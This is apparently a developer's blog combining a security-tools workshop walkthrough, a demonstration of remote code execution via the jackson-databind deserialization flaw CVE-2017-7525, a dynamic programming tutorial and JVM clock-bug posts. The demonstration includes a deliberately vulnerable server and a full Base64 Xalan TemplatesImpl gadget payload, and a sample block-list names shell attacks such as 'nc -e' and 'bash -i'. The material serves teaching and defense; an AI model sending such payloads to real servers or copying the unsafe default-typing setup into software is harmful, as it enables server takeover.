IMWorld Bucharest

I’ve just had the great pleasure of presenting again in Bucharest at this year’s IMWorld with an introduction to security tools. We had some WiFi issues, so I had to slightly change the workshop contents, but the audience was very supportive and overall we were all pleased with the results!

As the slides cover only the introduction to the topic, I will now detail the workshop contents here so that you can replay what we did live!

SAST/SIS TOOLS

SIS tools (Sensitive Information Scanners) are used to examine your codebase for the presence of information that should not be disclosed, like AWS or PGP keys.
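At their core, most of these scanners simply run a set of regular expressions (often combined with entropy checks) over every file and every commit in the repository history. As a minimal illustration of the regex part only (the AKIA pattern for AWS access key IDs is real; the sample strings are made up, and a real scanner obviously does much more):

```java
import java.util.ArrayList;
import java.util.List;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class TinySecretScanner {

    // AWS access key IDs start with "AKIA" followed by 16 uppercase alphanumerics
    private static final Pattern AWS_KEY = Pattern.compile("AKIA[0-9A-Z]{16}");

    // returns all AWS-looking key IDs found in the given text
    public static List<String> scan(String text) {
        List<String> hits = new ArrayList<>();
        Matcher m = AWS_KEY.matcher(text);
        while (m.find())
            hits.add(m.group());
        return hits;
    }

    public static void main(String[] args) {
        // AKIAIOSFODNN7EXAMPLE is the key ID Amazon uses in its own documentation
        String source = "aws.accessKeyId=AKIAIOSFODNN7EXAMPLE\npassword=hunter2";
        System.out.println(scan(source)); // [AKIAIOSFODNN7EXAMPLE]
    }
}
```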

 

git-leaks

Let’s start by having a look at gitleaks. You can download the binary from here, unpack it and check that it works with the command:

gitleaks-linux-amd64 --help

As you can see there are a lot of options, including the ability to run it against an entire organization, but for now run the command against a sample repository:

gitleaks-linux-amd64 --repo=https://github.com/gitleakstest/gronit

As you can see it is reporting problems: launch it again with --verbose and a few problems pop up (what about those AWS keys???). You can also add --report=report.csv --csv to generate a CSV report.

Now, why don’t you look at one of your OWN repositories? You could be surprised! Or try this one:

gitleaks-linux-amd64 --repo=https://github.com/dxa4481/truffleHog.git --verbose

 

trufflehog

trufflehog is a Python tool, so it’s extremely easy to install if you are on Linux! Just type:

sudo pip install trufflehog

You can check it works with:

trufflehog --help

There’s a lot you can do here: you can have the output in JSON, you can define extra rules, and so on. It deserves a bit of experimenting! But for the time being, please run it on the first repository:

trufflehog --regex https://github.com/gitleakstest/gronit

Again, we can see the AWS keys popping up (oops!). Now, try one of your repos, or maybe this one:

trufflehog --regex --entropy=False https://github.com/dxa4481/truffleHog.git
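Note that --entropy=False switches off trufflehog’s other detection mode: besides regexes, it flags strings whose Shannon entropy is suspiciously high, because random-looking strings in source code are often keys or tokens. A minimal sketch of that idea (ASCII input assumed; the threshold a real tool uses will differ):

```java
public class ShannonEntropy {

    // Shannon entropy, in bits per character, of an ASCII string
    public static double entropy(String s) {
        int[] counts = new int[128];
        for (char c : s.toCharArray())
            counts[c]++;
        double h = 0.0;
        for (int count : counts) {
            if (count == 0) continue;
            double p = (double) count / s.length();
            h -= p * (Math.log(p) / Math.log(2));
        }
        return h;
    }

    public static void main(String[] args) {
        // a string of identical characters carries no information at all
        System.out.println(entropy("aaaaaaaaaaaaaaaa")); // 0.0
        // a random-looking string scores high: it may well be a secret
        System.out.println(entropy("wJalrXUtnFEMI/K7MDENG+bPxRfiCy"));
    }
}
```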

 

Others

Due to the slightly more complicated installation, we won’t have a look at these ones, but I suggest you check them out as well:

  • gitrob: very comprehensive analysis
  • git-secrets: a git hook provided directly by AWS

 

SAST/SDA TOOLS

SDA tools (Sensitive Dependency Analysis), also known as SCAN (Software Composition ANalysis), are used to examine the software components you use in order to check whether any of them are affected by known vulnerabilities. Here I will shamelessly plug the tool my startup is building, Meterian, and I hope you do not mind 🙂
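At its core this kind of tool does something conceptually simple: it compares the exact coordinates of every component you depend on against a database of known-vulnerable versions. A toy sketch of the principle (the hardcoded “database” is a stub for illustration; real tools query feeds such as the NVD — the jackson-databind 2.8.8 entry matches the example used later in this post):

```java
import java.util.List;
import java.util.Map;

public class ToyDependencyCheck {

    // artifact coordinates -> versions with known vulnerabilities (stub data)
    private static final Map<String, List<String>> KNOWN_VULNERABLE = Map.of(
            "com.fasterxml.jackson.core:jackson-databind", List.of("2.8.8"));

    // true if this exact artifact+version pair has a known vulnerability
    public static boolean isVulnerable(String artifact, String version) {
        return KNOWN_VULNERABLE.getOrDefault(artifact, List.of()).contains(version);
    }

    public static void main(String[] args) {
        System.out.println(isVulnerable(
            "com.fasterxml.jackson.core:jackson-databind", "2.8.8")); // true
        System.out.println(isVulnerable(
            "org.example:some-safe-lib", "1.0.0")); // false
    }
}
```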

 

meterian

Download the latest client from the website and run it against a sample project (you can use this one we used in the previous blog post):

cd /your/project/folder
java -jar /path/to/meterian-cli.jar

You will probably be asked to authenticate: just use your GitHub or Google account to do so. You will see some scores (the security one will be, well, very low!) and a report will be generated: just click on the link to access it (again, same social login). If you used my example, jackson-databind 2.8.8 is definitely a winner! It’s potentially exposing your project to at least four different exploits… nice!

You can also see a list of possible upgrades for your libraries and (if the feature is enabled for your account) also the full list of components and the related versions.

 

dependency-check

Download the client from the website, following the link from GitHub, into a folder, and run it against the same project used before:

cd /your/project/folder
dependency-check/bin/dependency-check.sh --project sample --scan .

On the first run the tool will download the full NVD database, which takes a while! Just have a coffee or something, come back in 10 minutes, and you will find an HTML report in the folder:

dependency-check-report.html

Just open the report with a browser, you will see a list of the offending libraries.

SAST/SCA TOOLS

SCA tools (Software Code Analysis) are used to examine the code you write, either in binary or source format.

 

spotbugs

Download and unpack the tool, then set the SPOTBUGS_HOME variable:

export SPOTBUGS_HOME=/path/to/spotbugs-3.1.3

Spotbugs has a UI (of course it also works from the command line): launch the UI and do a quick demo:

java -jar $SPOTBUGS_HOME/lib/spotbugs.jar

Get some code on your laptop (I suggest the fastjson project, as it has a wide attack surface): create a new project, select the binary output of the project (you may need to run mvn package on the project to get it) and also select the source code. Click the button and then dig into the problems: you have a lot to get through!

Spotbugs has a nice plugin, findsecbugs, that specifically finds security problems: once you have downloaded the plugin, copy the jar file into the plugin folder of Spotbugs:

cp findsecbugs-plugin-1.8.0.jar $SPOTBUGS_HOME/plugin/

Open Spotbugs again, re-run the analysis and enjoy a tour of the new “Security” section!

PMD

Download and unpack the tool, then run it against the sample project from the newly created folder:

bin/run.sh pmd -f text -d /path/to/project -R rulesets/java/quickstart.xml

There are a number of rules here, enjoy some time investigating them!

Errorprone

This one can only be used as a build plugin, but it’s pretty effective! Clone the repository:

git clone git@github.com:google/error-prone.git

Or just download the zip:

wget https://github.com/google/error-prone/archive/master.zip && unzip master.zip

Move to the examples folder, change the pom.xml so that it references version 3.2.1 of error-prone and run:

mvn clean package

Notice that the build stops with an error (the exception not thrown) plus a suggestion: fix the errors one by one and see the compilation pass :).

RASP TOOLS

This is the last category of tools we will see today, and it’s quite an interesting one. RASP tools basically meld with your code, deploying an agent within it (typically using code instrumentation), and they actively track any malicious activity: when that happens, the tool takes some preventive measures (e.g. stopping the user session) and reports the issue back to your company risk assessment system.
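To give a feel for the idea, here is a deliberately naive sketch of the kind of in-process check a RASP hook performs: before a sensitive operation runs, the agent inspects its arguments and aborts the call if they look malicious. Real tools hook methods like Runtime.exec via bytecode instrumentation; everything below (the class, the block-list) is made up purely for illustration:

```java
import java.util.List;

public class NaiveRaspHook {

    // a toy block-list of substrings that should never appear in a command
    // built from user input (a real RASP engine uses far smarter detection)
    private static final List<String> SUSPICIOUS =
            List.of("/etc/passwd", "rm -rf", "nc -e", "bash -i");

    // the check the instrumented call site would run before executing a command
    public static boolean allowCommand(String command) {
        for (String bad : SUSPICIOUS) {
            if (command.contains(bad)) {
                // a real agent would also stop the session and report the event
                System.err.println("[rasp] blocked command: " + command);
                return false;
            }
        }
        return true;
    }

    public static void main(String[] args) {
        System.out.println(allowCommand("ls -l /tmp"));      // true
        System.out.println(allowCommand("cat /etc/passwd")); // false, and logged
    }
}
```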

OpenRASP

This is an open source tool by Baidu that shows an interesting take on the problem.

Download a fresh Tomcat from here, unpack it and start Tomcat the usual way:

cd apache-tomcat-8.5.6/
bin/catalina.sh run

Access http://127.0.0.1:8080 and see Tomcat working!

Clone the test cases from here, move into the subfolder java/vulns and create the war package:

mvn package

Copy the newly created package under the /webapps subfolder of Tomcat: the server will promptly hot-deploy the application.

cp openrasp-testcases/java/vulns/target/vulns.war apache-tomcat-8.5.6/webapps/

Visit http://127.0.0.1:8080/vulns to see the application page (you may need Google Translate at this point to get a bit of English!) and try exploits 002 and 004.2: see how easy it is to bypass security and execute commands on the server.

Now, download the 0.31 Java OpenRASP from here, unpack it and install it on Tomcat:

java -jar RaspInstall.jar -install  /path/to/apache-tomcat-8.5.6

Now restart Tomcat and you will see the OpenRASP logo in the console. Start tailing the OpenRASP log:

tail -f /path/to/apache-tomcat-8.5.6/rasp/logs/alarm/alarm.log

Try again to execute the vulnerabilities and… surprise!

  1. you are blocked with a fancy page 🙂
  2. the logs show the intrusion with complete detail

Hope you enjoy it!

 


Are you using an opensource library? There’s a good chance you are vulnerable…

This is the talk I presented yesterday at Codemotion Rome 2018! Awesome conference and people, cannot wait for the next one!

You can find a detailed technical explanation in my previous blog post, and you can also have access to the code on GitHub to reproduce the exploit yourself.

Do not underestimate your problem, and put the correct procedure in place: you do not want to be the next Equifax.

 

Remotely execute Java code using JSON

Abstract.

How difficult is it to exploit a vulnerability in a common Java library in order to remotely execute Java code on a remote server and successfully take control over it? Not much, really. In this article, we will demonstrate how to do that using CVE-2017-7525, a well-known vulnerability in jackson-databind, a widely used library to serialize and deserialize JSON, also part of the spring-boot stack.

The sample code.

As we all know, serializing and deserializing JSON messages is a very common task, especially in modern microservices REST-based applications: almost every time an API is called, a JSON message is sent to the server, to be transformed into a Java object. Because of a stream of deserialization vulnerabilities in jackson-databind, it’s now possible to write simple exploits in order to get access to unpatched servers when polymorphic type handling is enabled.

In order to clearly explain the concepts, we are introducing here a simple server that handles products with two REST APIs, one to get the list of the products and one to add a new product (all the code is available on GitHub). Please note that this is just a sample: we just want to provide you with a simple and understandable piece of code, and by no means can it be classified (we hope!) as production code.

A sample of our Product class, which holds some basic product information:

public class Product {

    private int id;
    private String name;
    private String description;
    private Object data; 

    protected Product() {
    }

    [...]

Our ProductsDatabase class, just a glorified HashMap:

public class ProductsDatabase {

  private Map<String, Product> products = new HashMap<>();
  private AtomicInteger idGenerator = new AtomicInteger(0);

  public ProductsDatabase() {
     add(new Product(0,"apple", "Real apple from Italy", randomData()));
     add(new Product(0,"orange", "Real orange from Italy", randomData()));
     add(new Product(0,"kiwi", "Real kiwi from Italy", randomData()));
  }

  public Collection list() {
    return Collections.unmodifiableCollection(products.values());
  }

  public Product add(Product newProduct) {
    Integer newId = idGenerator.incrementAndGet();
    Product product = newProduct.duplicate(newId);
    products.put(newId.toString(), product);
    return product;
  }

  [...]
}

Our simple server, written with SparkJava:

public class Main {
 
  private static ProductsDatabase products = new ProductsDatabase();
  private static ObjectMapper deserializer = new ObjectMapper().enableDefaultTyping();
  private static ObjectMapper serializer = new ObjectMapper();
 
  public static void main(String[] args) {

    port(8888);

    // GET list all products
    get("/products", (request, response) -> {
      Collection res = products.list();
      return serializer.writeValueAsString(res);
    });

    // POST add new product
    post("/products", (request, response) -> {
      Product received = deserializer.readValue(request.body(), Product.class);
      products.add(received);
      response.status(201);
      return ""; // Spark routes must return a value
    });
  }
  [...]
}

You can add a product to the database with a simple curl call with a JSON body containing the new product data:

curl -i -X POST -d '{"name":"melon","description":"Real melon from Italy", "data":["java.util.HashMap",{"cost":2,"color":"yellow"}]}' http://localhost:8888/products

The exploit.

In order to exploit the vulnerability, we need to have a vector. On this occasion we decided to use Apache Xalan, a common XSLT library also included in the JDK (which, until version 8u45, could itself be used as the vector, in the same way Xalan is used here). Please note that there are a lot of other options available as attack vectors, but for the sake of simplicity, we will focus here on a very specific one.

We will use a particular class from Xalan which is capable of deserializing an encoded class file from an XML and dynamically creating an instance of such a class: we will craft a JSON message that will contain the encoded class of our exploit, shown here:

public class Exploit extends org.apache.xalan.xsltc.runtime.AbstractTranslet {

  public Exploit() throws Exception {
    System.err.println("Your server has been compromised!");
  }

  @Override
  public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {
  }

  @Override
  public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {
  }
}

We just need to compile this source code into a .class file, encode it in Base64 and prepare our evil JSON message:

{
  "name": "fakeapple",
  "description": "Fake fruit from UK",
  "data": ["org.apache.xalan.xsltc.trax.TemplatesImpl",
  {
    "transletBytecodes" : [ "yv66vgAAADQALgcAAgEAB0V4cGxvaXQHAAQBAC9vcmcvYXBhY2hlL3hhbGFuL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEABjxpbml0PgEAAygpVgEACkV4Y2VwdGlvbnMHAAkBABNqYXZhL2xhbmcvRXhjZXB0aW9uAQAEQ29kZQoAAwAMDAAFAAYJAA4AEAcADwEAEGphdmEvbGFuZy9TeXN0ZW0MABEAEgEAA2VycgEAFUxqYXZhL2lvL1ByaW50U3RyZWFtOwgAFAEAIVlvdXIgc2VydmVyIGhhcyBiZWVuIGNvbXByb21pc2VkIQoAFgAYBwAXAQATamF2YS9pby9QcmludFN0cmVhbQwAGQAaAQAHcHJpbnRsbgEAFShMamF2YS9sYW5nL1N0cmluZzspVgEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBAAlMRXhwbG9pdDsBAAl0cmFuc2Zvcm0BAFAoTG9yZy9hcGFjaGUveGFsYW4veHNsdGMvRE9NO1tMb3JnL2FwYWNoZS94bWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgcAIgEAKG9yZy9hcGFjaGUveGFsYW4veHNsdGMvVHJhbnNsZXRFeGNlcHRpb24BAAhkb2N1bWVudAEAHExvcmcvYXBhY2hlL3hhbGFuL3hzbHRjL0RPTTsBAAhoYW5kbGVycwEAMVtMb3JnL2FwYWNoZS94bWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjsBAHMoTG9yZy9hcGFjaGUveGFsYW4veHNsdGMvRE9NO0xvcmcvYXBhY2hlL3htbC9kdG0vRFRNQXhpc0l0ZXJhdG9yO0xvcmcvYXBhY2hlL3htbC9zZXJpYWxpemVyL1NlcmlhbGl6YXRpb25IYW5kbGVyOylWAQAIaXRlcmF0b3IBACRMb3JnL2FwYWNoZS94bWwvZHRtL0RUTUF4aXNJdGVyYXRvcjsBAAdoYW5kbGVyAQAwTG9yZy9hcGFjaGUveG1sL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7AQAKU291cmNlRmlsZQEADEV4cGxvaXQuamF2YQAhAAEAAwAAAAAAAwABAAUABgACAAcAAAAEAAEACAAKAAAAOwACAAEAAAANKrcAC7IADRITtgAVsQAAAAIAGwAAAAoAAgAAAAgABAAJABwAAAAMAAEAAAANAB0AHgAAAAEAHwAgAAIABwAAAAQAAQAhAAoAAAA/AAAAAwAAAAGxAAAAAgAbAAAABgABAAAADQAcAAAAIAADAAAAAQAdAB4AAAAAAAEAIwAkAAEAAAABACUAJgACAAEAHwAnAAIABwAAAAQAAQAhAAoAAABJAAAABAAAAAGxAAAAAgAbAAAABgABAAAAEgAcAAAAKgAEAAAAAQAdAB4AAAAAAAEAIwAkAAEAAAABACgAKQACAAAAAQAqACsAAwABACwAAAACAC0=" ],
    "transletName": "oops!",
    "outputProperties": {}
   }
 }

After sending the message to the server as a normal “add product” request, the encoded class will be instantiated by the Xalan TemplatesImpl class in order for it to populate the value of the outputProperties field: as the constructor code is executed, the evil code runs as well and the server is compromised. Yes, you might see exceptions on the server, but it’s too late.
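The proper fix, of course, is to upgrade jackson-databind and to avoid enableDefaultTyping() altogether (newer Jackson versions offer a related safeguard via PolymorphicTypeValidator). Purely as a self-contained illustration of the defense principle, here is a sketch of an allow-list check on polymorphic type names appearing in a payload; the regex and the allowed set are assumptions made up for this example, not a production-grade parser:

```java
import java.util.Set;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class TypeAllowList {

    // only these class names may appear as polymorphic types in a payload
    private static final Set<String> ALLOWED = Set.of(
            "java.util.HashMap", "java.util.ArrayList");

    // naively matches the class name in payloads like ["com.example.Foo", {...}]
    private static final Pattern TYPE = Pattern.compile("\\[\\s*\"([\\w.$]+)\"");

    // reject the request before it ever reaches the deserializer
    public static boolean isPayloadSafe(String json) {
        Matcher m = TYPE.matcher(json);
        while (m.find()) {
            if (!ALLOWED.contains(m.group(1)))
                return false;
        }
        return true;
    }

    public static void main(String[] args) {
        System.out.println(isPayloadSafe(
            "{\"data\":[\"java.util.HashMap\",{\"cost\":2}]}"));                 // true
        System.out.println(isPayloadSafe(
            "{\"data\":[\"org.apache.xalan.xsltc.trax.TemplatesImpl\",{}]}"));  // false
    }
}
```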

Conclusions.

This is just an example of the hundreds of exploits currently possible using public vulnerabilities in various open source libraries, and for that reason it’s extremely important that you add to your build pipeline a scanner capable of detecting such situations and blocking the build when one is found. We would kindly invite you to use our simple command line client available at meterian.io and avoid future nasty surprises. You do not want to be the next Equifax.

You can reach me at meterian.io!

Disclaimer: please note that all this information is publicly available on the internet. This is just a summary post from a cybersecurity practitioner and nothing else. The code provided is for research purposes only.
Creative Commons Licence
This work is licensed under a Creative Commons Attribution-NonCommercial 4.0 International License.

Dynamic Programming explained (hopefully)

Okay, so some of you have certainly already heard about Dynamic Programming (DP); this is what I have understood so far, and I am happy to share it with you.

Theory

In short, DP is all about ordering your computations in a way that avoids recalculating duplicate work: you have a main problem and a lot of subproblems.

There are two key attributes that a problem must have in order for DP to be applicable: optimal substructure and overlapping subproblems:

  • when you have optimal substructure, the optimal solution of a given problem can be obtained from the combination of optimal solutions of its subproblems
  • when you have overlapping subproblems, the solution of a problem requires the same subproblems again and again

Hey, please note that if a problem can be solved by combining optimal solutions of non-overlapping subproblems then we are in the “divide and conquer” area, where for example merge sort and quick sort lie.

Dynamic Programming is typically implemented using two common techniques, tabulation and memoization:

  • when you solve a DP problem using tabulation you solve it with a bottom-up approach, by solving all subproblems first and filling an n-dimensional table: based on such a table, the solution to the original problem is computed. Because of that, tabulation solves all the subproblems.
  • when you solve a DP problem using memoization you do it by maintaining a map of already solved subproblems: you solve the problem top-down, basically solving the top problem first and then recursing into the subproblems. Memoization may pay an overhead due to the recursion, but it does not need to solve all the subproblems.

Please note that in DP you will often use backtracking, which incrementally builds candidates for the solution and then abandons them when it determines that they cannot contribute to the solution.
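To make the backtracking idea concrete, here is a tiny sketch (not from the original post) solving subset-sum: we extend the current candidate one element at a time and abandon it as soon as it cannot work anymore. It assumes positive inputs, which makes the pruning test valid:

```java
public class SubsetSum {

    // true if some subset of nums (all assumed positive) sums to target
    public static boolean hasSubsetWithSum(int[] nums, int target) {
        return search(nums, 0, target);
    }

    private static boolean search(int[] nums, int index, int remaining) {
        if (remaining == 0) return true;               // candidate is a solution
        if (index == nums.length || remaining < 0)
            return false;                              // dead end: backtrack
        return search(nums, index + 1, remaining - nums[index]) // take nums[index]
            || search(nums, index + 1, remaining);              // or skip it
    }

    public static void main(String[] args) {
        int[] nums = {3, 34, 4, 12, 5, 2};
        System.out.println(hasSubsetWithSum(nums, 9));  // true (4 + 5)
        System.out.println(hasSubsetWithSum(nums, 30)); // false
    }
}
```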

Some code, please!

Ok, all good. Now where do we go from here? Some code will help 🙂 A typical DP problem is the Fibonacci sequence:

fib(n) = fib(n-1) + fib(n-2)

I guess you can already see the overlapping subproblems and the optimal substructure: let’s try to solve this with the most natural solution (I guess), which is recursion.

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else
            return fib(val - 1) + fib(val - 2);
    }

Ok, cool. It works: result! Pretty inefficient though, as it uses a large amount of stack memory and computes the solution to the same problem again and again! For example, to compute fib(5) it will compute fib(2) three times. How can we improve this? Well, memoization comes in handy:

    private static Map<Integer, Integer> cache = new HashMap<Integer, Integer>();

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        else {
            Integer res = cache.get(val);
            if (res == null) {
                res = fib(val - 1) + fib(val - 2);
                cache.put(val, res);
            }
            
            return res;
        }        
    }

Ok, this is better. At least we do not recompute the same solution many times, but we still use a lot of stack memory to handle the recursion. And, at the end of the day, we need to compute all the subproblems to solve this one, don’t we? Why don’t we use tabulation then? If we do so, we can revert to a nice iterative solution!

    private static int fib(int val) {
        if (val == 0 || val == 1)
            return 1;
        
        int fibs[] = new int[val+1];
        fibs[0] = 1;
        fibs[1] = 1;
        
        for (int i=2; i<=val; i++)
            fibs[i] = fibs[i-1] + fibs[i-2];
        
        return fibs[val];
    }

Ah, that’s better! No more recursion, a plain iterative process going on, just a bit of memory used for our table. But wait… can we do any better? Do we really need the whole table? Can we do better than Dynamic Programming?

    private static int fib(int val) {
        int prev = 0;
        int curr = 1;
        
        for (int i=2; i<=val; i++) {
            int next = curr + prev;
            prev = curr;
            curr = next;
        }
        
        return curr;
    }

Oh yeah 🙂 We just need to keep the last two values, fib(n-1) and fib(n-2): job done!

Conclusions (?)

DP was useful to think out the best algorithm, and it was instrumental in discovering it; but then we needed that plain old spark of genius that not all of us have (certainly not me!), and some help was very welcome. Without DP (and without a bigger spark) we would never have easily found an elegant and efficient O(n) solution, so it helps to know about it. And some problems are really not solvable without DP, so please do not underestimate it!

Let me know if you are interested in this stuff, I can post more 🙂

 

 

Java: no timeout on DNS resolution

Breaking news! I just discovered (well, actually yesterday) that it’s not possible to set a timeout on DNS resolution in Java, which relies on the underlying OS. This is NOT good when you have any shape or form of SLA or QoS: you are basically throwing it out of the window!

I suggest you do something about it. This is the code I pushed on msnos (see here code and test): basically it uses a thread pool and a Future to make the magic happen:

[...]
import org.apache.http.conn.DnsResolver;
[...]
public class DnsResolverWithTimeout implements DnsResolver {

    [...]
    @Override
    public InetAddress[] resolve(final String host) throws UnknownHostException {

        Future<InetAddress[]> result = executor.submit(new Callable<InetAddress[]>() {
            @Override
            public InetAddress[] call() throws Exception {
                return systemResolver.resolve(host);
            }
        });

        try {
            return result.get(timeoutInMillis, TimeUnit.MILLISECONDS);
        } catch (InterruptedException e) {
            log.warn("Unexpected interruption while resolving host "+host, e);
            Thread.currentThread().interrupt();
        } catch (ExecutionException e) {
            log.warn("Unexpected execution exception", e.getCause());
        } catch (TimeoutException e) {
            log.warn("Timeout of {} millis elapsed resolving host {}", timeoutInMillis, host);
        }

        throw new UnknownHostException(host + ": DNS timeout");
    }
}

Of course you can make sure your OS is behaving, but you may not have such luxury 🙂

JVM issue: concurrency is affected by changing the date of the system! [part 4]

I am frequently challenged about the seriousness of this bug and the impact it has. It’s not the first time I try to explain that, because this bug affects LockSupport.parkNanos(), it basically spreads like a virus across the whole platform. Let’s see this more practically:

$ grep -r -l "parkNanos" .
./java/util/concurrent/Future.java
./java/util/concurrent/FutureTask.java
./java/util/concurrent/ThreadPoolExecutor.java
./java/util/concurrent/ScheduledThreadPoolExecutor.java
./java/util/concurrent/RunnableFuture.java
./java/util/concurrent/package-info.java
./java/util/concurrent/ExecutorCompletionService.java
./java/util/concurrent/CancellationException.java
./java/util/concurrent/RunnableScheduledFuture.java
./java/util/concurrent/CompletableFuture.java
./java/util/concurrent/AbstractExecutorService.java
./javax/swing/text/JTextComponent.java
./javax/swing/SwingWorker.java
./sun/swing/text/TextComponentPrintable.java
./sun/swing/SwingUtilities2.java

Well, it does not look that bad, does it? But uhm… I guess we are missing something… who’s using these classes? And who’s using those classes? And who’s using those? Omg… I am getting a headache! Almost EVERYTHING is using this! So trust me, you will be affected. Maybe you still don’t believe it, but please remember that this also affects Object.wait(long) and so, transitively, synchronized as well. Wait… WOOT? Oh yeah 🙂 Lots of fun! Especially when your system, deployed on client premises, starts doing “strange” things and you are called by your (not very happy) support team.

Be aware that this bug is now fixed in JDK 8, and I have no knowledge of any successful backports into JDK 7.

See also
The full saga, all the articles I published on the matter:

JVM issue: concurrency is affected by changing the date of the system! [part 3]

I have been asked for further information about the matter, and for that reason I am posting a bit more code here. It’s C++, so be aware! For the record, we are looking at the sources of the HotSpot JVM; you can find the source here:
http://hg.openjdk.java.net/jdk8/jdk8/hotspot/file/aed585cafc0d/src/os/linux/vm/os_linux.cpp

Let’s have a look at the park() function of PlatformEvent, which is used within all synchronization primitives of the JVM:

int os::PlatformEvent::park(jlong millis) {
   [...]
 
   struct timespec abst;
   compute_abstime(&abst, millis);
   [...]

   while (_Event < 0) {
     status = os::Linux::safe_cond_timedwait(_cond, _mutex, &abst);
     if (status != 0 && WorkAroundNPTLTimedWaitHang) {
       pthread_cond_destroy (_cond);
       pthread_cond_init (_cond, NULL) ;
     }
     assert_status(status == 0 || status == EINTR ||
                   status == ETIME || status == ETIMEDOUT,
                   status, "cond_timedwait");
     if (!FilterSpuriousWakeups) break ;                 // previous semantics
     if (status == ETIME || status == ETIMEDOUT) break ;
     // We consume and ignore EINTR and spurious wakeups.
   }

Please look at the line where the end time to wait is computed, the call to compute_abstime: if you open that function (line 5480) you will notice that it’s calculating an absolute time, based on the wall clock:

   [...]
   static struct timespec* compute_abstime(timespec* abstime, jlong millis) {

      if (millis < 0)  millis = 0;

      struct timeval now;
      int status = gettimeofday(&now, NULL);
      [...]

So what will happen is that the park function will be waiting on an absolute time based on a wall clock, hence will fail miserably if the wall clock is changed.

The simplest fix, without changing too much code, would be to use CLOCK_MONOTONIC (or CLOCK_MONOTONIC_RAW, even better) to compute the absolute time ( clock_gettime(CLOCK_MONOTONIC, &ts) ) and also to check it the same way in the main loop (you can associate any available clock with a pthread_cond_timedwait).

Then, if we really want to stay on the safe side, we should avoid using absolute delays and use relative delays, as the POSIX specs explicitly guarantee that threads waiting on a relative time are not affected by changes to the underlying clock, while with absolute delays the situation is historically “fuzzy”.

Is that complex? It does not look so, at least from the code (I will try to patch it myself for sure), but I surely do not grasp the complexity of the whole HotSpot, so I may fail miserably. It also has to be noted that my C++ skills are kind of dated 🙂

See also
The full saga, all the articles I published on the matter: